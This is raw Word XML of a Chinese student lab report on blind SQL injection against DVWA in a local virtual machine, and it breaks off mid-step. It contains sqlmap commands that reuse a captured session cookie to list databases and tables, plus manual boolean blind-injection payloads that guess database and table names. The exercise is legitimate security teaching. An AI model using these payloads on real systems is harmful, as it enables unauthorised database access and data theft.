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2FE9D" w14:textId="5DB4E30E" w:rsidR="00306243" w:rsidRDefault="0048598B" w:rsidP="00BE5C2F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《</w:t>
      </w:r>
      <w:r w:rsidR="00CE44E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SQL盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C2F" w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E9904" w14:textId="5FBD9737" w:rsidR="00BE5C2F" w:rsidRDefault="00BE5C2F" w:rsidP="00BE5C2F">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00EF4BEA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汤清云</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 学号：</w:t>
      </w:r>
      <w:r w:rsidR="00EF4BEA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2013536</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>班级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF4BEA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60E8F8" w14:textId="77777777" w:rsidR="00BE5C2F" w:rsidRPr="00BE5C2F" w:rsidRDefault="00BE5C2F" w:rsidP="00BE5C2F">
      <w:pPr>
        <w:jc w:val="righ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</w:p>
    <w:p w14:paraId="23D66CFB" w14:textId="77777777" w:rsidR="00BE5C2F" w:rsidRP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实验名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7AD485" w14:textId="5DEF1393" w:rsidR="0000472F" w:rsidRPr="00D97780" w:rsidRDefault="00CE44E4" w:rsidP="00BE5C2F">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="42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基于DVWA的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537E209" w14:textId="37DCB018" w:rsidR="00BE5C2F" w:rsidRDefault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要求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334ABEC1" w14:textId="5EDDDD75" w:rsidR="00D97780" w:rsidRPr="00BE5C2F" w:rsidRDefault="00D97780">
      <w:pPr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ab/>
      </w:r>
      <w:r w:rsidR="00CE44E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>基于DVWA的SQL盲注</w:t>
      </w:r>
      <w:r w:rsidR="00CE44E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>实现手工SQL盲注，</w:t>
      </w:r>
      <w:r w:rsidR="00113A8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>撰写实验报告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C80B4F" w14:textId="3551275F" w:rsidR="00BE5C2F" w:rsidRDefault="00BE5C2F" w:rsidP="006530FE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实验</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05602CDD" w14:textId="777A8998" w:rsidR="00CE44E4" w:rsidRDefault="009C3C3E" w:rsidP="009C3C3E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加载虚拟镜像，直接在VMWare中打开。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD95CA" w14:textId="26910772" w:rsidR="009C3C3E" w:rsidRPr="009C3C3E" w:rsidRDefault="003D717D" w:rsidP="009C3C3E">
      <w:pPr>
        <w:ind w:left="420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24D77084" wp14:editId="27FBD357">
            <wp:extent cx="5274310" cy="15119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E91B" w14:textId="2C56F51E" w:rsidR="009C3C3E" w:rsidRDefault="003D717D" w:rsidP="003D717D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r w:rsidRPr="003D717D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>账户为root</w:t>
      </w:r>
      <w:r w:rsidRPr="003D717D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D717D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>密码为owaspbwa。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F064B5B" w14:textId="40D81FA5" w:rsidR="003D717D" w:rsidRDefault="003D717D" w:rsidP="003D717D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460435B6" wp14:editId="5F3CF6E2">
            <wp:extent cx="5274310" cy="1278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CF83" w14:textId="27CED56C" w:rsidR="003D717D" w:rsidRDefault="00AF153D" w:rsidP="003D717D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打开kali虚拟机浏览器，输入网址为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>92.168.</w:t>
      </w:r>
      <w:r w:rsidR="0063667F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>7.1</w:t>
      </w:r>
      <w:r w:rsidR="0063667F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE4C7A" w14:textId="28A1C0E5" w:rsidR="00E05016" w:rsidRDefault="00E05016" w:rsidP="00E05016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7564F35" wp14:editId="7719821E">
            <wp:extent cx="5274310" cy="30295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EBE" w14:textId="64B61C45" w:rsidR="00E05016" w:rsidRDefault="00F76518" w:rsidP="00E05016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选择D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>amn Vulnerable Web Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，用户名，密码均为root。选择SQL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lastRenderedPageBreak/>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidR="00AC4C7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC4C7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0EBE67" w14:textId="39FC5796" w:rsidR="00F76518" w:rsidRDefault="00AC4C7C" w:rsidP="00F76518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20B8EAC3" wp14:editId="301A90C4">
            <wp:extent cx="5274310" cy="3029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848" w14:textId="72EBC116" w:rsidR="00195F75" w:rsidRDefault="00195F75" w:rsidP="00195F75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输入user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ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>=1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，点击提交后可以看出该网站此时使用的get方式提交：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFF7FC" w14:textId="203C9B66" w:rsidR="00195F75" w:rsidRPr="00195F75" w:rsidRDefault="00195F75" w:rsidP="00195F75">
      <w:pPr>
        <w:pStyle w:val="a7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50224D67" wp14:editId="310DA124">
            <wp:extent cx="5274310" cy="13557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9B84" w14:textId="16BC0C8D" w:rsidR="00195F75" w:rsidRDefault="00195F75" w:rsidP="00195F75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加入永真式and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>来验证此网站是否可以被攻击。验证结果为可以。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A478D" w14:textId="6226E9BE" w:rsidR="00195F75" w:rsidRDefault="00195F75" w:rsidP="00195F75">
      <w:pPr>
        <w:ind w:left="420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1C312496" wp14:editId="6D229123">
            <wp:extent cx="5274310" cy="5619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BF2" w14:textId="5C60DA8F" w:rsidR="00195F75" w:rsidRDefault="00195F75" w:rsidP="009851A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使用kali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linux自带的sqlmap进行攻击。输入语句：</w:t>
      </w:r>
      <w:r w:rsidR="009851A0" w:rsidRPr="009851A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00684305" w:rsidRPr="00BC634B">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:b/>
          </w:rPr>
          <w:t>http://192.168.247.129/dvwa/vulnerabilities/sqli/?id=1234 and 1=1&amp;Submit=Submit#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0025101D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FBE63E" w14:textId="5C272BF4" w:rsidR="00684305" w:rsidRDefault="00684305" w:rsidP="009851A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修改浏览器设置-settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>manual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proxy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configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE1025" w14:textId="473E8C78" w:rsidR="00684305" w:rsidRDefault="00B116C0" w:rsidP="00684305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1BF7AB6D" wp14:editId="28866788">
            <wp:extent cx="5274310" cy="3029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D0C" w14:textId="21FD7978" w:rsidR="00B116C0" w:rsidRDefault="0025101D" w:rsidP="00B116C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设置好后重新在sql注入界面输入1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>2345678</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，则paros显示</w:t>
      </w:r>
      <w:r w:rsidR="00AC4C7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>结果如下图，我们得到cookie信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD83FB6" w14:textId="1FCDC002" w:rsidR="0025101D" w:rsidRDefault="00FD344D" w:rsidP="0025101D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34BBEB4" wp14:editId="3F4FBB47">
            <wp:extent cx="5274310" cy="30295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D7B0" w14:textId="28E12D50" w:rsidR="005A79E4" w:rsidRPr="005A79E4" w:rsidRDefault="00923F1E" w:rsidP="005A79E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 w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>所得cookie中的SESSID即为当前会话的标识，获得此标识后我们可以伪造成该会话以发送请求。</w:t>
      </w:r>
      <w:r w:rsidR="005A79E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidR="005A79E4" w:rsidRPr="005A79E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>sqlmap -u "http://192.168.247.129/dvwa/vulnerabilities/sqli/?id=1234 and 1=1&amp;Submit=Submit#" --cookie "security=low; PHPSESSID=ruaofkao5o7f325f6ar2ivbcf7; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"</w:t>
      </w:r>
      <w:r w:rsidR="005A79E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E4D80" w14:textId="65B936B0" w:rsidR="005A79E4" w:rsidRDefault="005A79E4" w:rsidP="005A79E4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4C4163F3" wp14:editId="7634E16E">
            <wp:extent cx="5274310" cy="902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F65A" w14:textId="3C6C3122" w:rsidR="005A79E4" w:rsidRDefault="00F45F31" w:rsidP="005A79E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r w:rsidRPr="005A79E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>sqlmap -u "http://192.168.247.129/dvwa/vulnerabilities/sqli/?id=1234 and 1=1&amp;Submit=Submit#" --cookie "security=low; PHPSESSID=ruaofkao5o7f325f6ar2ivbcf7; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>dbs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获取数据库信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5C08B" w14:textId="4D014F74" w:rsidR="00F45F31" w:rsidRDefault="00F45F31" w:rsidP="00F45F3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5BADBD6F" wp14:editId="568525A0">
            <wp:extent cx="5274310" cy="1047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F74C" w14:textId="4251CD66" w:rsidR="00F45F31" w:rsidRDefault="00F45F31" w:rsidP="00F45F3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 xml:space="preserve">输入 </w:t>
      </w:r>
      <w:r w:rsidRPr="005A79E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>sqlmap -u "http://192.168.247.129/dvwa/vulnerabilities/sqli/?id=1234 and 1=1&amp;Submit=Submit#" --cookie "security=low; PHPSESSID=ruaofkao5o7f325f6ar2ivbcf7; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>D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dvwa得到表的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E40E6" w14:textId="0397E408" w:rsidR="00F45F31" w:rsidRDefault="00F45F31" w:rsidP="00F45F3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8364F5B" wp14:editId="18D034CC">
            <wp:extent cx="5274310" cy="1238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C2C5" w14:textId="417E0311" w:rsidR="00767440" w:rsidRDefault="0096105B" w:rsidP="00767440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在SQL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Injection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Blind中输入1，显示用户存在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A486FFB" w14:textId="17285910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00BE9DD0" wp14:editId="18768DBD">
            <wp:extent cx="5274310" cy="2379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86A5" w14:textId="4E06F655" w:rsidR="0096105B" w:rsidRDefault="0096105B" w:rsidP="0096105B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lastRenderedPageBreak/>
        <w:t>输入1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">’ and 1=1# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>单引号闭合前边，而#闭合后边内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70728F12" w14:textId="7C24FF34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0E9EFAD2" wp14:editId="3FC3D402">
            <wp:extent cx="5274310" cy="17646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669" w14:textId="6C334299" w:rsidR="0096105B" w:rsidRDefault="0096105B" w:rsidP="0096105B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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>’ and 1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>没有结果，说明存在字符型sql盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2E3BB" w14:textId="32F41DA4" w:rsidR="0096105B" w:rsidRDefault="0096105B" w:rsidP="0096105B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5D7B44C0" wp14:editId="34948DE9">
            <wp:extent cx="5274310" cy="24676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EEC" w14:textId="1F5C95CA" w:rsidR="00AA5081" w:rsidRDefault="00AA5081" w:rsidP="00AA508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点击view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source查看源代码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D12FD" w14:textId="66092004" w:rsidR="00AA5081" w:rsidRDefault="00AA5081" w:rsidP="00AA5081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121A4EB7" wp14:editId="13A9F5C0">
            <wp:extent cx="5274310" cy="29641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1671" w14:textId="34435AB1" w:rsidR="00AA5081" w:rsidRDefault="00CC765F" w:rsidP="00AA5081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回到盲注页面，从0开始依次输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and length(database())=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>来猜解出数据库长度，结果为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FAF658" w14:textId="67DBBBDF" w:rsidR="00CC765F" w:rsidRDefault="00CC765F" w:rsidP="00CC765F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650122D0" wp14:editId="58FC732F">
            <wp:extent cx="5274310" cy="2092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621" w14:textId="7E740EE4" w:rsidR="00CC765F" w:rsidRDefault="00BE0376" w:rsidP="00CC765F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使用二分法猜解出数据库名称，语句为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
      <w:r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 w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>(substr(database(),1,1))&gt;97 #</w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>结果显示当&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>和&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="00CD669E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>时均不存在，说明第一个字母为d，以此不断以二分法猜解，得出结果为dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C4560" w14:textId="5AF66714" w:rsidR="0097563C" w:rsidRPr="0097563C" w:rsidRDefault="0097563C" w:rsidP="0097563C">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39DD3F89" wp14:editId="6A320414">
            <wp:extent cx="5274310" cy="2165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3B4E" w14:textId="2BD07AE8" w:rsidR="00CD669E" w:rsidRDefault="00350369" w:rsidP="00CC765F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猜解数据库中表的数量：使用语句</w:t>
      </w:r>
      <w:r w:rsidR="004566B9" w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
      <w:r w:rsidR="004566B9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (select count(table_name) from information_schema.tables where table_schema=database()) =1 #</w:t>
      </w:r>
      <w:r w:rsidR="00D90592">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D90592">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>猜解到2时显示存在，说明dvwa中存在两张表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807D8BD" w14:textId="5D4F8ED6" w:rsidR="00D90592" w:rsidRDefault="00D90592" w:rsidP="00D90592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72B3817F" wp14:editId="69CC4A69">
            <wp:extent cx="5274310" cy="9899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88C6" w14:textId="1F4540B0" w:rsidR="00D90592" w:rsidRDefault="0029656F" w:rsidP="00D90592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猜解每个表的表名长度：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
